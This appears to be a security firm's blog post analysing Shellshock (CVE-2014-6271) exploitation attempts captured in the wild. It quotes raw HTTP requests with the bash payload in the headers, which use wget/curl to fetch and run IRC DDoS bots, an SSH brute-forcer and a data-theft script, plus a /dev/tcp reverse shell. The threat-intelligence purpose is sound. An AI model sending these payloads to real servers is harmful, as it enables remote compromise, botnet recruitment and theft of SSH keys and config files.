SHELLSHOCK – Threat samples from CVE-2014-6271


To our surprise we collected nearly 23 malware samples in the 11 hrs of action starting the morning of the 26th UTC, before we could go beyond those 11hrs, we decided to attempt to document what we picked up. To draw a pre-mature conclusion “Bad actors maintain a constant state of preparedness to execute a mass exploitation campaign on any new and available vulnerability”.

The “Good Samaritan” Scan

The first ones to appear on the radar were the good samaritan scans, these scans could either be security researchers trying to scan the continents, or (the more likely) bad actors documenting vulnerable systems for later use. One of the most common samples exploits the bug and makes the system sends an ICMP echo request back to a listening (documentation) server.

GET / HTTP/1.0 User-Agent: () { :; }; ping -c 900 xxx.xxx.xxx.xxx Accept: */*

The ping was more of a quick and dirty methods to identify vulnerable servers, soon we started receiving more complex scans, this one below had setup that made a vulnerable server call back a randomly generated URI. The staging server would use this random string to document the server details for later use.

GET / HTTP/1.1 Accept-Encoding: identity Referer: () { :; }; /bin/bash -c 'wget http://cxxxxxxxat.ru/bmV0Y3J1aXNlLmluU2hlbGxTaG9ja1NhbHQ= >> /dev/null' Host: xxx.xxxxxx.xx Cookie: () { :; }; /bin/bash -c 'wget http://cxxxxxxxat.ru/bmV0Y3J1aXNlLmluU2hlbGxTaG9ja1NhbHQ= >> /dev/null' Connection: close User-Agent: () { :; }; /bin/bash -c 'wget http://cxxxxxxxat.ru/bmV0Y3J1aXNlLmluU2hlbGxTaG9ja1NhbHQ= >> /dev/null'

Notice the subtle way in which the downloaded file being pushed away to /dev/null, just to ensure no traces were left behind.

IRC Bot – DDoS Launcher

This is a typical IRC Bot that downloads itself from the vulture machine, installs and cleans up the residue. This perl file is a known IRC Bot that connects to a predefined IRC and listens for commands.

GET /cgi-bin/hi HTTP/1.0 User-Agent: () { :;}; /bin/bash -c "cd /tmp;wget http://213.5.xx.xxx/ji;curl -O /tmp/ji http://213.5.xx.xxx/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*"

The bot has a large number of template commands that can be used to manage an IRC connection, however the bot is designed to launch specific DDoS attacks on targets defined by the bot master through IRC in real-time.

Brute-force Daemon

Another instance where a perl script is downloaded from a vulture server, and executed. This script launches a ssh brute-force daemon which loads up the wordlist from generic websites.

GET / HTTP/1.1 Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awaxxxxxxe.com/auth; /usr/bin/perl /tmp/auth.pl Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awaxxxxxxe.com/auth; /usr/bin/perl /tmp/auth.pl

The script then logs into Command and Control (C&C) domain over IRC and downloads the targets. Daemon is stealth and runs low intensity cycles.

Data Theft Agent

A *NIX systems nightmare, this is a simple bash shell code that creates a copy of the essential config files, packs them up into a tar file and uploads it to controller servers.

GET / HTTP/1.0 User-Agent: () { :;}; /bin/bash -c "wget http://staxxxxxxxt.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://staxxxxxxxt.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"

Key items to be noticed here are the .bot file is downloaded as a shell script, the shell script is executed and once in memory, the script is deleted from the disk. This bot is known to be running until the server is restarted and the memory is cleaned again. Most importantly, this script does not forget the .ssh/ folder that contains all the public and the private keys.

Reverse Shell

The number of hits on this sample has continued to grow consistently, it’s a simple call home script that connects to a listening server. Most of these samples collected connect to unassuming bots / compromised systems.

GET /cgi-bin/ HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: () { :;}; /bin/ -c "/bin/ -i >& /dev/tcp/xxx.xxx.xxx.xxx/3333 0>&1"

On call back a binary file is downloaded from a vulture machine and executed. This binary calls back the controller for commands periodically. The sheer number of compromised systems calling home has run the controller out of resources and therefore several connect attempts fail before one that is successful.

CVE-2014-6271 is likely to suffer from a long burn phenomenon. The vulnerability impacts 67.4% of servers (reference) worldwide and has the potential to create havoc for long time to come.

Leave a Reply

Your email address will not be published. Required fields are marked *



© 2015-2016 All Rights Reserved. NETMONASTERY™ and CNAM™ is a registered trademark of NETMONASTERY NSPL.